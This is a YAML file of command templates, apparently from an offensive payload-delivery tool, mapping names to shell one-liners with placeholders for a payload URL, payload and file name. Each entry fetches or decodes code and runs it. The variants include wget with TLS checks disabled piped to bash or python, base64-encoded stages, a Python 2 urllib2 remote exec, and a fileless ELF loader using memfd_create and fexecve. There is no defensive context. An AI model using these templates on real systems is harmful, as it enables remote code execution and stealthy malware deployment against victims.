wget_generic: >-
    wget --no-check-certificate -qO- {payload_url} | tee {payload_id} && chmod +x {payload_id} && ./{payload_id}
wget_generic_base64: >-
    wget --no-check-certificate -qO- {payload_url} | base64 -d | tee {payload_id} && chmod +x {payload_id} && ./{payload_id}
wget_bash: >-
    wget --no-check-certificate -qO- {payload_url} | bash
wget_bash_base64: >-
    wget --no-check-certificate -qO- {payload_url} | base64 -d | bash
python: >-
    wget --no-check-certificate -qO- {payload_url} | python -
python_base64: >-
    wget --no-check-certificate -qO- {payload_url} | base64 -d | python -
python2: >-
    printf 'import urllib2\nexec(urllib2.urlopen("{payload_url}").read())\n' | python -
python2_base64: >-
    printf 'import urllib2\nimport base64\nexec(base64.b64decode(urllib2.urlopen("{payload_url}").read().encode()).decode())\n' | python -
python_inline_base64: >-
    echo "{payload}" | base64 -d | python -
generic_inline: >-
    echo "{payload}" | tee {payload_id} && chmod +x {payload_id} && ./{payload_id}
generic_inline_base64: >-
    echo "{payload}" | base64 -d | tee {payload_id} && chmod +x {payload_id} && ./{payload_id}
#generic_inline_multi:
#    - echo "{payload}" | base64 -d | tee {payload_id} && chmod +x {payload_id}
#    - ./{payload_id}
elf_python_base64: >-
    printf '%s\n%s\n%s\n%s\n%s\n%s%s%s\n%s\n%s\n%s\n' 
    "import ctypes, os, urllib2, base64" 
    "libc = ctypes.CDLL(None)" 
    "argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))" 
    "syscall = libc.syscall"
    "fexecve = libc.fexecve" 
    "content = base64.b64decode(\"" "{payload}" "\")"
    "fd = syscall(319, \"\", 1)"
    "os.write(fd, content)"
    "fexecve(fd, argv, argv)" | python -
